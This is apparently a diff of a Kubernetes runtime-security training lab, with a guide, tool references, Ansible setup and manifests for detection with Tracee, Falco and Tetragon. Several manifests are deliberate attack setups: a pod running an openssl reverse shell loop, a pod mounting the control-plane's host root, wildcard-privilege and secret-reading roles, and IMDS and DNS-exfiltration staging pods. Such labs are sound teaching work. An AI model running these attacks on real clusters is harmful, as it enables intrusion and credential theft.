+**If viewing on GitHub, you can navigate using the table of contents button in the top left next to the line count.**
+
+## Using Vi - useful shortcuts for the lab.
+
+Use the arrow keys to move the cursor.
+
+`i` to enter insert mode and edit contents.
+While in insert mode, the bottom-left corner shows `-- INSERT --`:
+
+
+
+
+`[esc]` to exit insert mode once changes are made.
+
+`u` outside insert mode to undo a change.
+
+`dd` to remove a line outside of insert mode.
+
+`:` to bring up the vi command line outside of insert mode.
+
+`:wq` to save and quit.
+
+`:q!` to exit without changes.
+
+## Troubleshooting - list of error messages and what to do:
+
+**None of the commands work without sudo**
+
+Add your user to the docker group (log out and back in, or run `newgrp docker`, for the group change to take effect):
+
+```
+sudo usermod -aG docker $USER
+```
+
+If `kubectl` itself isn't found, make it executable and move it onto your PATH:
+
+```
+chmod +x kubectl
+sudo mv ./kubectl /usr/local/bin/kubectl
+```
+
+**I'm stuck in my container and can't exit with Ctrl+C**
+
+- Open a new terminal window
+- Run `docker container ls`
+- Find the stuck container
+- Run `docker stop $containerID` (the first few characters of the ID are enough, e.g. `docker stop ac29`)
+
+**kubectl commands don't work**
+
+Running a kubectl command, you see this:
+"The connection to the server localhost:8080 was refused - did you specify the right host or port?"
+
+Your kubeconfig has been blown away. Regenerate it from kind:
+
+```
+kind get kubeconfig --name lab > ~/.kube/config
+```
+
+or switch back to the lab context:
+
+```
+kubectl config use-context kind-lab
+```
+
+**HTTP endpoint (Pipedream) isn't receiving requests**
+
+- Make sure you copied the correct endpoint URL from Pipedream (not the dashboard URL)
+- The URL should look like `https://eo*.m.pipedream.net`
+- Verify the URL is set correctly in your Dockerfile's `ENV URL` line
+
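Before rebuilding your image, it can save a round trip to sanity-check the shape of the endpoint URL. A minimal sketch — the URL below is a made-up example, substitute your own:

```
URL="https://eoabc123.m.pipedream.net"   # replace with your real endpoint
if echo "$URL" | grep -qE '^https://eo[a-z0-9]+\.m\.pipedream\.net$'; then
  echo "URL looks right"
else
  echo "URL looks wrong - copy the endpoint URL, not the dashboard URL"
fi
```
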
+**`ESC` keymapping to escape vim in the Google console web browser is not working**
+
+Map the escape key to another key combination from within vim, e.g.:
+
+`:imap jj <Esc>`
+
+## Supply Chain Tools Quick Reference
+
+**cosign** - Image signing and verification
+```
+# Generate key pair
+cosign generate-key-pair
+
+# Sign an image (requires push access to registry)
+cosign sign --key cosign.key $IMAGE
+
+# Verify an image signature
+cosign verify --key cosign.pub $IMAGE
+```
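Because `cosign verify` exits non-zero when verification fails, it can gate a deploy step directly. A minimal sketch, assuming cosign is on your `PATH` and a `cosign.pub` from the key-pair step above; the image name is a made-up example:

```
IMAGE="registry.example.com/myapp:1.0"   # hypothetical image name
if cosign verify --key cosign.pub "$IMAGE" > /dev/null 2>&1; then
  echo "signature OK - safe to deploy"
else
  echo "signature verification failed - do not deploy"
fi
```
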
+
+**crane** - Container registry interactions
+```
+# View image manifest
+crane manifest $IMAGE | jq
+
+# List tags
+crane ls $IMAGE
+
+# Get image digest (immutable reference)
+crane digest $IMAGE
+
+# Export image filesystem
+crane export $IMAGE output.tar
+```
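The digest from `crane digest` is an immutable reference: a tag can be re-pushed to point at different content, a digest cannot. Pinning an image is simple string concatenation (the digest below is a made-up example value):

```
IMAGE="ubuntu"
DIGEST="sha256:77906da86b60585ce12215807090eb327e7386c8fafb5402369e421f44eff17e"   # example value
PINNED="${IMAGE}@${DIGEST}"
echo "$PINNED"
```

A `image@sha256:...` reference like this is what you'd put in a deployment manifest to prevent tag-swapping attacks.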
+
+**syft** - SBOM generation
+```
+# Generate SBOM for an image
+syft $IMAGE
+
+# Output as SPDX JSON
+syft $IMAGE -o spdx-json
+
+# Output as CycloneDX
+syft $IMAGE -o cyclonedx-json
+```
+
+**grype** - Vulnerability scanning
+```
+# Scan an image
+grype $IMAGE
+
+# Scan with SBOM input
+grype sbom:sbom.json
+
+# Fail on critical vulns (useful in CI)
+grype $IMAGE --fail-on critical
+
+# Only show fixable vulns
+grype $IMAGE --only-fixed
+```
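The two tools chain together: generate the SBOM once with syft, then rescan it with grype as often as you like without re-pulling the image. A minimal sketch, guarded so it degrades gracefully when the tools aren't installed:

```
IMAGE="ubuntu:22.04"
if command -v syft >/dev/null 2>&1 && command -v grype >/dev/null 2>&1; then
  syft "$IMAGE" -o json > sbom.json
  grype sbom:sbom.json --fail-on critical
else
  echo "syft/grype not found - see the Version Reference for install versions"
fi
```
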
+
+## Runtime Security Tools Quick Reference
+
+**Tracee**
+```
+# Check Tracee pods
+kubectl get pods -n tracee-system
+
+# View Tracee events
+kubectl logs -n tracee-system -l app.kubernetes.io/name=tracee --tail=50
+
+# Run standalone Docker Tracee
+docker run --name tracee -d --rm --pid=host --cgroupns=host --privileged \
+ -v /etc/os-release:/etc/os-release-host:ro \
+ -e LIBBPFGO_OSRELEASE_FILE=/etc/os-release-host \
+ aquasec/tracee:latest
+```
+
+**Falco**
+```
+# Check Falco pods
+kubectl get pods -n falco-system
+
+# View Falco alerts
+kubectl logs -n falco-system -l app.kubernetes.io/name=falco --tail=50
+
+# Access Falcosidekick UI
+kubectl port-forward svc/falco-falcosidekick-ui -n falco-system 2802:2802
+```
+
+**Tetragon**
+```
+# Check Tetragon pods
+kubectl get pods -n tetragon
+
+# View Tetragon events
+kubectl logs -n tetragon -l app.kubernetes.io/name=tetragon -c export-stdout --tail=50
+
+# List TracingPolicies
+kubectl get tracingpolicies
+```
+
+## Grafana Loki Queries
+
+**Tracee events:**
+```
+{namespace="tracee-system"} |= `matchedPolicies` != `sshd` | json | line_format "{{.log}}"
+```
+
+**Falco events:**
+```
+{namespace="falco-system"} | json | line_format "{{.log}}"
+```
+
+**Tetragon events:**
+```
+{namespace="tetragon"} | json | line_format "{{.log}}"
+```
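The queries above can be narrowed with a line filter before the `json` stage. For example, to show only Falco events for a single rule (`Terminal shell in container` is one of Falco's default rule names; swap in any substring):

```
{namespace="falco-system"} |= `Terminal shell in container` | json | line_format "{{.log}}"
```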
+
+## Version Reference
+
+| Component | Version |
+|-----------|---------|
+| Kubernetes | v1.31.4 |
+| kind | v0.27.0 |
+| Helm | v3.16.4 |
+| kubectl | v1.31.4 |
+| cosign | v2.4.1 |
+| crane | v0.20.2 |
+| syft | v1.18.1 |
+| grype | v0.85.0 |
+| Tracee | 0.24.0 |
diff --git a/current/grafana/tracee-dashboard.json b/current/grafana/tracee-dashboard.json
new file mode 100644
index 0000000..47d2e51
--- /dev/null
+++ b/current/grafana/tracee-dashboard.json
@@ -0,0 +1,172 @@
+{
+ "annotations": {
+ "list": [
+ {
+ "builtIn": 1,
+ "datasource": {
+ "type": "grafana",
+ "uid": "-- Grafana --"
+ },
+ "enable": true,
+ "hide": true,
+ "iconColor": "rgba(0, 211, 255, 1)",
+ "name": "Annotations & Alerts",
+ "type": "dashboard"
+ }
+ ]
+ },
+ "editable": true,
+ "fiscalYearStartMonth": 0,
+ "graphTooltip": 0,
+ "id": 29,
+ "links": [],
+ "liveNow": false,
+ "panels": [
+ {
+ "datasource": {
+ "type": "loki",
+ "uid": "a3fda37a-4998-4161-ae3c-4d44fc0cec38"
+ },
+ "gridPos": {
+ "h": 8,
+ "w": 12,
+ "x": 0,
+ "y": 0
+ },
+ "id": 3,
+ "options": {
+ "dedupStrategy": "none",
+ "enableLogDetails": true,
+ "prettifyLogMessage": false,
+ "showCommonLabels": false,
+ "showLabels": false,
+ "showTime": false,
+ "sortOrder": "Descending",
+ "wrapLogMessage": false
+ },
+ "targets": [
+ {
+ "datasource": {
+ "type": "loki",
+ "uid": "a3fda37a-4998-4161-ae3c-4d44fc0cec38"
+ },
+ "editorMode": "builder",
+ "expr": "{namespace=\"tracee-system\"} |= `matchedPolicies` != `sshd` | json | line_format `\"{{.log}}\"`",
+ "key": "Q-1624ec1f-ad81-496f-81c4-20697b2d94f1-0",
+ "queryType": "range",
+ "refId": "A"
+ }
+ ],
+ "title": "Tracee Events",
+ "type": "logs"
+ },
+ {
+ "datasource": {
+ "type": "loki",
+ "uid": "a3fda37a-4998-4161-ae3c-4d44fc0cec38"
+ },
+ "fieldConfig": {
+ "defaults": {
+ "color": {
+ "mode": "palette-classic"
+ },
+ "custom": {
+ "axisCenteredZero": false,
+ "axisColorMode": "text",
+ "axisLabel": "",
+ "axisPlacement": "auto",
+ "barAlignment": 0,
+ "drawStyle": "line",
+ "fillOpacity": 0,
+ "gradientMode": "none",
+ "hideFrom": {
+ "legend": false,
+ "tooltip": false,
+ "viz": false
+ },
+ "lineInterpolation": "linear",
+ "lineWidth": 1,
+ "pointSize": 5,
+ "scaleDistribution": {
+ "type": "linear"
+ },
+ "showPoints": "auto",
+ "spanNulls": false,
+ "stacking": {
+ "group": "A",
+ "mode": "none"
+ },
+ "thresholdsStyle": {
+ "mode": "off"
+ }
+ },
+ "mappings": [],
+ "thresholds": {
+ "mode": "absolute",
+ "steps": [
+ {
+ "color": "green",
+ "value": null
+ },
+ {
+ "color": "red",
+ "value": 80
+ }
+ ]
+ }
+ },
+ "overrides": []
+ },
+ "gridPos": {
+ "h": 8,
+ "w": 12,
+ "x": 0,
+ "y": 8
+ },
+ "id": 2,
+ "options": {
+ "legend": {
+ "calcs": [],
+ "displayMode": "list",
+ "placement": "bottom",
+ "showLegend": true
+ },
+ "tooltip": {
+ "mode": "single",
+ "sort": "none"
+ }
+ },
+ "targets": [
+ {
+ "datasource": {
+ "type": "loki",
+ "uid": "a3fda37a-4998-4161-ae3c-4d44fc0cec38"
+ },
+ "editorMode": "builder",
+ "expr": "{app=\"tracee\"} | json | __error__=``",
+ "queryType": "range",
+ "refId": "A"
+ }
+ ],
+ "title": "Tracee Events Over Time",
+ "type": "timeseries"
+ }
+ ],
+ "refresh": "",
+ "schemaVersion": 38,
+ "style": "dark",
+ "tags": [],
+ "templating": {
+ "list": []
+ },
+ "time": {
+ "from": "now-6h",
+ "to": "now"
+ },
+ "timepicker": {},
+ "timezone": "",
+ "title": "Tracee WIP",
+ "uid": "f8cc421a-74b2-4ca4-ba83-201e1955a439",
+ "version": 7,
+ "weekStart": ""
+}
\ No newline at end of file
diff --git a/current/helm-config/grafana-config.yaml b/current/helm-config/grafana-config.yaml
new file mode 100644
index 0000000..17c1ed6
--- /dev/null
+++ b/current/helm-config/grafana-config.yaml
@@ -0,0 +1,15 @@
+prometheus:
+ prometheusSpec:
+ serviceMonitorSelectorNilUsesHelmValues: false
+ serviceMonitorSelector: {}
+ serviceMonitorNamespaceSelector: {}
+
+grafana:
+ sidecar:
+ datasources:
+ defaultDatasourceEnabled: true
+ additionalDataSources:
+ # Loki monolithic mode service name (replaces loki-distributed)
+ - name: Loki
+ type: loki
+ url: http://loki.monitoring:3100
diff --git a/current/helm-config/promtail-config.yaml b/current/helm-config/promtail-config.yaml
new file mode 100644
index 0000000..a3678f9
--- /dev/null
+++ b/current/helm-config/promtail-config.yaml
@@ -0,0 +1,5 @@
+config:
+ serverPort: 8080
+ clients:
+ # Loki monolithic mode endpoint (replaces loki-distributed gateway)
+ - url: http://loki.monitoring:3100/loki/api/v1/push
diff --git a/current/image.png b/current/image.png
new file mode 100644
index 0000000..bd03a54
Binary files /dev/null and b/current/image.png differ
diff --git a/current/k8s-ansible-setup.yml b/current/k8s-ansible-setup.yml
new file mode 100644
index 0000000..38c9005
--- /dev/null
+++ b/current/k8s-ansible-setup.yml
@@ -0,0 +1,170 @@
+---
+- hosts: localhost
+ name: Setup Kubernetes cluster
+ gather_facts: false
+ tasks:
+ - name: Create namespaces
+ ansible.builtin.command: kubectl apply -f k8s-manifests/namespaces.yaml
+ register: kubectl_run
+ changed_when:
+ - "'created' in kubectl_run.stdout"
+
+ - name: Create ClusterRoles
+ ansible.builtin.command: kubectl apply -f k8s-manifests/clusterroles.yaml
+ register: kubectl_run
+ changed_when:
+ - "'created' in kubectl_run.stdout"
+
+ - name: Create Roles
+ ansible.builtin.command: kubectl apply -f k8s-manifests/roles.yaml
+ register: kubectl_run
+ changed_when:
+ - "'created' in kubectl_run.stdout"
+
+ - name: Create Service Accounts
+ ansible.builtin.command: kubectl apply -f k8s-manifests/serviceaccounts.yaml
+ register: kubectl_run
+ changed_when:
+ - "'created' in kubectl_run.stdout"
+
+ - name: Create ClusterRoleBindings
+ ansible.builtin.command: kubectl apply -f k8s-manifests/clusterrolebindings.yaml
+ register: kubectl_run
+ changed_when:
+ - "'created' in kubectl_run.stdout"
+
+ - name: Create RoleBindings
+ ansible.builtin.command: kubectl apply -f k8s-manifests/rolebindings.yaml
+ register: kubectl_run
+ changed_when:
+ - "'created' in kubectl_run.stdout"
+
+ - name: Create Deployments
+ ansible.builtin.command: kubectl apply -f k8s-manifests/deployments.yaml
+ register: kubectl_run
+ changed_when:
+ - "'created' in kubectl_run.stdout"
+
+ - name: Create Pods
+ ansible.builtin.command: kubectl apply -f k8s-manifests/pods.yaml
+ register: kubectl_run
+ changed_when:
+ - "'created' in kubectl_run.stdout"
+
+ - name: Create Services
+ ansible.builtin.command: kubectl apply -f k8s-manifests/services.yaml
+ register: kubectl_run
+ changed_when:
+ - "'created' in kubectl_run.stdout"
+
+ # --- Prometheus + Grafana (kube-prometheus-stack) ---
+ - name: Install prometheus for kind clusters
+ ansible.builtin.command:
+ cmd: |
+ helm install kind-prometheus prometheus-community/kube-prometheus-stack
+ --namespace monitoring
+ --set prometheus.service.nodePort=30000
+ --set prometheus.service.type=NodePort
+ --set grafana.service.nodePort=31000
+ --set grafana.service.type=NodePort
+ --set grafana.adminPassword=prom-operator
+ --set alertmanager.service.nodePort=32000
+ --set alertmanager.service.type=NodePort
+ --set prometheus-node-exporter.service.nodePort=32001
+ --set prometheus-node-exporter.service.type=NodePort
+ --values helm-config/grafana-config.yaml
+ register: helm_install
+ changed_when:
+ - "'STATUS: deployed' in helm_install.stdout"
+
+ # --- Promtail (log shipping to Loki) ---
+ - name: Install promtail
+ ansible.builtin.command:
+ cmd: |
+ helm upgrade
+ --install promtail grafana/promtail
+ --values helm-config/promtail-config.yaml
+ --namespace monitoring
+ register: helm_install
+ changed_when:
+ - "'STATUS: deployed' in helm_install.stdout"
+
+ # --- Loki (monolithic mode - replaces deprecated loki-distributed) ---
+ - name: Install loki (monolithic mode)
+ ansible.builtin.command:
+ cmd: |
+ helm upgrade
+ --install loki grafana/loki
+ --namespace monitoring
+ --set loki.commonConfig.replication_factor=1
+ --set loki.storage.type=filesystem
+ --set singleBinary.replicas=1
+ --set loki.auth_enabled=false
+ register: helm_install
+ changed_when:
+ - "'STATUS: deployed' in helm_install.stdout"
+
+ # --- Secrets ---
+ - name: Add secrets
+ ansible.builtin.command:
+ cmd: |
+ kubectl create -f k8s-manifests/secrets.yaml
+ register: kubectl_run
+ changed_when:
+ - "'created' in kubectl_run.stdout"
+
+ # --- Developer context setup ---
+ - name: Setup developer context for later
+ ansible.builtin.shell: |
+ set -o pipefail
+ SECRET_NAME="developer-user-token"
+ TOKEN=$(kubectl get secret ${SECRET_NAME} --namespace=pls-dont-hack-me -o jsonpath='{$.data.token}' | base64 -d | sed $'s/$/\\\n/g')
+ kubectl config set-credentials developer --token=${TOKEN}
+ kubectl config set-context developer@kind-lab --user=developer --cluster=kind-lab --namespace=pls-dont-hack-me
+ args:
+ executable: /usr/bin/bash
+ register: cmd_output
+ changed_when:
+ - "'created' in cmd_output.stdout"
+
+ # --- Tracee (updated from 0.19.0 to 0.24.0) ---
+ - name: Install tracee
+ ansible.builtin.command:
+ cmd: |
+ helm install tracee aqua/tracee
+ --namespace tracee-system
+ --set hostPID=true
+ --version 0.24.0
+ --set nodeSelector.role=control-plane
+ register: helm_install
+ changed_when:
+ - "'STATUS: deployed' in helm_install.stdout"
+
+ # --- Falco (new - complementary runtime detection) ---
+ - name: Install falco
+ ansible.builtin.command:
+ cmd: |
+ helm install falco falcosecurity/falco
+ --namespace falco-system
+ --create-namespace
+ --set falcosidekick.enabled=true
+ --set falcosidekick.webui.enabled=true
+ --set driver.kind=ebpf
+ --set collectors.containerd.enabled=true
+ --set collectors.containerd.socket=/run/containerd/containerd.sock
+ register: helm_install
+ changed_when:
+ - "'STATUS: deployed' in helm_install.stdout"
+
+ # --- Tetragon (new - Cilium eBPF security observability) ---
+ - name: Install tetragon
+ ansible.builtin.command:
+ cmd: |
+ helm install tetragon cilium/tetragon
+ --namespace tetragon
+ --create-namespace
+ --set tetragon.enableProcessCred=true
+ --set tetragon.enableProcessNs=true
+ register: helm_install
+ changed_when:
+ - "'STATUS: deployed' in helm_install.stdout"
diff --git a/current/k8s-manifests/attacker-pod.yaml b/current/k8s-manifests/attacker-pod.yaml
new file mode 100644
index 0000000..e08a41f
--- /dev/null
+++ b/current/k8s-manifests/attacker-pod.yaml
@@ -0,0 +1,33 @@
+apiVersion: v1
+kind: Pod
+metadata:
+ name: malicious-pod
+ labels:
+ app: malicious
+spec:
+ containers:
+ - name: malicious-container
+ image: ubuntu:22.04
+ env:
+ - name: NODE_IP
+ valueFrom:
+ fieldRef:
+ fieldPath: status.hostIP
+ command: ["/bin/bash"]
+ args:
+ - "-c"
+ - |
+ apt-get update -qq && apt-get install -y -qq openssl strace > /dev/null 2>&1
+ while true; do
+ echo "Simulating reverse shell to attacker c2 at 4443"
+ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect $NODE_IP:4443 > /tmp/s; rm /tmp/s
+ strace ls
+ sleep 90
+ done
+ resources:
+ limits:
+ cpu: "1"
+ memory: "512Mi"
+ requests:
+ cpu: "0.5"
+ memory: "256Mi"
diff --git a/current/k8s-manifests/clusterrolebindings.yaml b/current/k8s-manifests/clusterrolebindings.yaml
new file mode 100644
index 0000000..acb2ad8
--- /dev/null
+++ b/current/k8s-manifests/clusterrolebindings.yaml
@@ -0,0 +1,26 @@
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRoleBinding
+metadata:
+ name: read-secrets-clusterrolebinding
+subjects:
+- kind: ServiceAccount
+ name: read-secrets
+ namespace: pls-dont-hack-me
+roleRef:
+ kind: ClusterRole
+ name: secret-reader
+ apiGroup: rbac.authorization.k8s.io
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRoleBinding
+metadata:
+ name: security-admin-clusterrolebinding
+subjects:
+- kind: ServiceAccount
+ name: security-svc
+ namespace: tracee-system
+roleRef:
+ kind: ClusterRole
+ name: security-admin-role
+ apiGroup: rbac.authorization.k8s.io
\ No newline at end of file
diff --git a/current/k8s-manifests/clusterroles.yaml b/current/k8s-manifests/clusterroles.yaml
new file mode 100644
index 0000000..c5fe1c1
--- /dev/null
+++ b/current/k8s-manifests/clusterroles.yaml
@@ -0,0 +1,20 @@
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRole
+metadata:
+ # "namespace" omitted since ClusterRoles are not namespaced
+ name: secret-reader
+rules:
+- apiGroups: [""]
+ resources: ["secrets"]
+ verbs: ["get", "watch", "list"]
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRole
+metadata:
+ # "namespace" omitted since ClusterRoles are not namespaced
+ name: security-admin-role
+rules:
+- apiGroups: [""]
+ resources: ["*"]
+ verbs: ["*"]
diff --git a/current/k8s-manifests/configmaps.yaml b/current/k8s-manifests/configmaps.yaml
new file mode 100644
index 0000000..e69de29
diff --git a/current/k8s-manifests/daemonsets.yaml b/current/k8s-manifests/daemonsets.yaml
new file mode 100644
index 0000000..e69de29
diff --git a/current/k8s-manifests/deployments.yaml b/current/k8s-manifests/deployments.yaml
new file mode 100644
index 0000000..3e07de3
--- /dev/null
+++ b/current/k8s-manifests/deployments.yaml
@@ -0,0 +1,49 @@
+---
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+ name: myapp
+ namespace: pls-dont-hack-me
+spec:
+ selector:
+ matchLabels:
+ app: myapp
+ template:
+ metadata:
+ labels:
+ app: myapp
+ spec:
+ containers:
+ - name: myapp
+ image: ubuntu:22.04
+ command: ["/bin/sleep", "infinity"]
+ resources:
+ limits:
+ memory: "128Mi"
+ cpu: "500m"
+ ports:
+ - containerPort: 80
+ serviceAccountName: read-secrets
+---
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+ name: juice-shop
+spec:
+ selector:
+ matchLabels:
+ app: juice-shop
+ template:
+ metadata:
+ labels:
+ app: juice-shop
+ spec:
+ containers:
+ - name: juice-shop
+ image: bkimminich/juice-shop
+ resources:
+ limits:
+ memory: "256Mi"
+ cpu: "500m"
+ ports:
+ - containerPort: 3000
diff --git a/current/k8s-manifests/evilpod.yaml b/current/k8s-manifests/evilpod.yaml
new file mode 100644
index 0000000..41d7a28
--- /dev/null
+++ b/current/k8s-manifests/evilpod.yaml
@@ -0,0 +1,30 @@
+---
+apiVersion: v1
+kind: Pod
+metadata:
+ name: evil-pod
+ namespace: pls-dont-hack-me
+ labels:
+ app: evil-pod
+spec:
+ containers:
+ - name: evil-pod
+ image: ubuntu:22.04
+ resources:
+ requests:
+ memory: "64Mi"
+ cpu: "250m"
+ limits:
+ memory: "256Mi"
+ cpu: "500m"
+ volumeMounts: # Mount that host path volume below, under /controlplane inside the pod's container
+ - mountPath: /controlplane
+ name: noderoot
+ command: [ "/bin/sh", "-c", "--" ]
+ args: [ "while true; do sleep 30; done;" ]
+ nodeName: lab-control-plane # Forces pod to run on control-plane node
+ volumes:
+ - name: noderoot # Creates a volume that mounts the host's root directory
+ hostPath:
+ path: /
+
\ No newline at end of file
diff --git a/current/k8s-manifests/imds-demo-pod.yaml b/current/k8s-manifests/imds-demo-pod.yaml
new file mode 100644
index 0000000..87dc7e0
--- /dev/null
+++ b/current/k8s-manifests/imds-demo-pod.yaml
@@ -0,0 +1,26 @@
+---
+# Pod for IMDS attack demonstration
+# When running on a cloud provider (AWS/GCP/Azure), this pod can query the
+# instance metadata service. In our kind lab, this demonstrates the concept
+# and the commands, even though the IMDS endpoint won't be available.
+apiVersion: v1
+kind: Pod
+metadata:
+ name: imds-attack-pod
+ namespace: pls-dont-hack-me
+ labels:
+ app: imds-attack
+ demo: cloud-native
+spec:
+ containers:
+ - name: imds-attacker
+ image: alpine/curl:8.11.1
+ command: ["/bin/sh", "-c", "--"]
+ args: ["while true; do sleep 30; done;"]
+ resources:
+ requests:
+ memory: "64Mi"
+ cpu: "250m"
+ limits:
+ memory: "128Mi"
+ cpu: "500m"
diff --git a/current/k8s-manifests/ingress.yaml b/current/k8s-manifests/ingress.yaml
new file mode 100644
index 0000000..e69de29
diff --git a/current/k8s-manifests/namespaces.yaml b/current/k8s-manifests/namespaces.yaml
new file mode 100644
index 0000000..57f615d
--- /dev/null
+++ b/current/k8s-manifests/namespaces.yaml
@@ -0,0 +1,30 @@
+---
+apiVersion: v1
+kind: Namespace
+metadata:
+ name: pls-dont-hack-me
+---
+apiVersion: v1
+kind: Namespace
+metadata:
+ name: monitoring
+---
+apiVersion: v1
+kind: Namespace
+metadata:
+ name: tracee-system
+---
+apiVersion: v1
+kind: Namespace
+metadata:
+ name: alert-demo
+---
+apiVersion: v1
+kind: Namespace
+metadata:
+ name: falco-system
+---
+apiVersion: v1
+kind: Namespace
+metadata:
+ name: tetragon
\ No newline at end of file
diff --git a/current/k8s-manifests/network-policy-demo.yaml b/current/k8s-manifests/network-policy-demo.yaml
new file mode 100644
index 0000000..a3588f7
--- /dev/null
+++ b/current/k8s-manifests/network-policy-demo.yaml
@@ -0,0 +1,66 @@
+---
+# Default deny all ingress traffic in pls-dont-hack-me namespace
+apiVersion: networking.k8s.io/v1
+kind: NetworkPolicy
+metadata:
+ name: default-deny-ingress
+ namespace: pls-dont-hack-me
+spec:
+ podSelector: {}
+ policyTypes:
+ - Ingress
+---
+# Default deny all egress traffic in pls-dont-hack-me namespace
+apiVersion: networking.k8s.io/v1
+kind: NetworkPolicy
+metadata:
+ name: default-deny-egress
+ namespace: pls-dont-hack-me
+spec:
+ podSelector: {}
+ policyTypes:
+ - Egress
+---
+# Allow DNS egress (required for most pods to function)
+# This is the kind of policy that often gets added as an afterthought,
+# and can be abused for DNS exfiltration
+apiVersion: networking.k8s.io/v1
+kind: NetworkPolicy
+metadata:
+ name: allow-dns-egress
+ namespace: pls-dont-hack-me
+spec:
+ podSelector: {}
+ policyTypes:
+ - Egress
+ egress:
+ - to:
+ - namespaceSelector: {}
+ ports:
+ - protocol: UDP
+ port: 53
+ - protocol: TCP
+ port: 53
+---
+# Pod for testing network policy enforcement and DNS exfiltration
+apiVersion: v1
+kind: Pod
+metadata:
+ name: netpol-test-pod
+ namespace: pls-dont-hack-me
+ labels:
+ app: netpol-test
+ demo: cloud-native
+spec:
+ containers:
+ - name: netpol-tester
+ image: alpine/curl:8.11.1
+ command: ["/bin/sh", "-c", "--"]
+ args: ["while true; do sleep 30; done;"]
+ resources:
+ requests:
+ memory: "64Mi"
+ cpu: "250m"
+ limits:
+ memory: "128Mi"
+ cpu: "500m"
diff --git a/current/k8s-manifests/nothingallowedpod.yaml b/current/k8s-manifests/nothingallowedpod.yaml
new file mode 100644
index 0000000..9aab5ed
--- /dev/null
+++ b/current/k8s-manifests/nothingallowedpod.yaml
@@ -0,0 +1,19 @@
+apiVersion: v1
+kind: Pod
+metadata:
+ name: nothing-allowed-exec-pod
+ labels:
+ app: pentest
+spec:
+ containers:
+ - name: nothing-allowed-pod
+ image: alpine/curl:8.11.1
+ resources:
+ requests:
+ memory: "64Mi"
+ cpu: "250m"
+ limits:
+ memory: "256Mi"
+ cpu: "500m"
+ command: [ "/bin/sh", "-c", "--" ]
+ args: [ "while true; do sleep 30; done;" ]
diff --git a/current/k8s-manifests/pods.yaml b/current/k8s-manifests/pods.yaml
new file mode 100644
index 0000000..6a66844
--- /dev/null
+++ b/current/k8s-manifests/pods.yaml
@@ -0,0 +1,17 @@
+---
+apiVersion: v1
+kind: Pod
+metadata:
+ name: tracee-tester
+ labels:
+ name: tracee-tester
+ namespace: alert-demo
+spec:
+ containers:
+ - name: tracee-tester
+ image: aquasec/tracee-tester:latest
+ args: ["TRC-107", "TRC-1018", "TRC-1016"]
+ resources:
+ limits:
+ memory: "128Mi"
+ cpu: "250m"
diff --git a/current/k8s-manifests/rolebindings.yaml b/current/k8s-manifests/rolebindings.yaml
new file mode 100644
index 0000000..e3b6200
--- /dev/null
+++ b/current/k8s-manifests/rolebindings.yaml
@@ -0,0 +1,28 @@
+---
+kind: RoleBinding
+apiVersion: rbac.authorization.k8s.io/v1
+metadata:
+ name: developer-developer
+ namespace: pls-dont-hack-me
+subjects:
+- kind: ServiceAccount
+ name: developer
+ namespace: pls-dont-hack-me
+roleRef:
+ apiGroup: rbac.authorization.k8s.io
+ kind: Role
+ name: developer
+---
+kind: RoleBinding
+apiVersion: rbac.authorization.k8s.io/v1
+metadata:
+ name: devops-deployment
+ namespace: pls-dont-hack-me
+subjects:
+- kind: ServiceAccount
+ name: deployment-svc
+ namespace: pls-dont-hack-me
+roleRef:
+ apiGroup: rbac.authorization.k8s.io
+ kind: Role
+ name: devops
\ No newline at end of file
diff --git a/current/k8s-manifests/roles.yaml b/current/k8s-manifests/roles.yaml
new file mode 100644
index 0000000..63f9c71
--- /dev/null
+++ b/current/k8s-manifests/roles.yaml
@@ -0,0 +1,38 @@
+---
+kind: Role
+apiVersion: rbac.authorization.k8s.io/v1
+metadata:
+ name: admin
+ namespace: pls-dont-hack-me
+rules:
+- apiGroups: ["", "extensions", "apps"]
+ resources: ["*"]
+ verbs: ["*"]
+- apiGroups: ["batch"]
+ resources:
+ - jobs
+ - cronjobs
+ verbs: ["*"]
+---
+kind: Role
+apiVersion: rbac.authorization.k8s.io/v1
+metadata:
+ namespace: pls-dont-hack-me
+ name: devops
+rules:
+- apiGroups: ["", "extensions", "apps"]
+ resources: ["deployments", "replicasets", "pods", "services", "ingresses"]
+ verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
+---
+kind: Role
+apiVersion: rbac.authorization.k8s.io/v1
+metadata:
+ namespace: pls-dont-hack-me
+ name: developer
+rules:
+- apiGroups: [""]
+ resources: ["pods", "pods/log"]
+ verbs: ["get", "list", "create"]
+- apiGroups: [""]
+ resources: ["pods/exec"]
+ verbs: ["get","create"]
\ No newline at end of file
diff --git a/current/k8s-manifests/secrets.yaml b/current/k8s-manifests/secrets.yaml
new file mode 100644
index 0000000..a760e63
--- /dev/null
+++ b/current/k8s-manifests/secrets.yaml
@@ -0,0 +1,18 @@
+---
+apiVersion: v1
+kind: Secret
+metadata:
+ name: developer-user-token
+ annotations:
+ kubernetes.io/service-account.name: developer
+ namespace: pls-dont-hack-me
+type: kubernetes.io/service-account-token
+---
+apiVersion: v1
+kind: Secret
+metadata:
+ name: security-svc-token
+ annotations:
+ kubernetes.io/service-account.name: security-svc
+ namespace: tracee-system
+type: kubernetes.io/service-account-token
\ No newline at end of file
diff --git a/current/k8s-manifests/serviceaccounts.yaml b/current/k8s-manifests/serviceaccounts.yaml
new file mode 100644
index 0000000..5e5f44c
--- /dev/null
+++ b/current/k8s-manifests/serviceaccounts.yaml
@@ -0,0 +1,24 @@
+---
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+ name: read-secrets
+ namespace: pls-dont-hack-me
+---
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+ name: developer
+ namespace: pls-dont-hack-me
+---
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+ name: deployment-svc
+ namespace: pls-dont-hack-me
+---
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+ name: security-svc
+ namespace: tracee-system
\ No newline at end of file
diff --git a/current/k8s-manifests/services.yaml b/current/k8s-manifests/services.yaml
new file mode 100644
index 0000000..a5885d8
--- /dev/null
+++ b/current/k8s-manifests/services.yaml
@@ -0,0 +1,17 @@
+---
+apiVersion: v1
+kind: Service
+metadata:
+ name: juice-shop-service
+ namespace: pls-dont-hack-me
+ annotations:
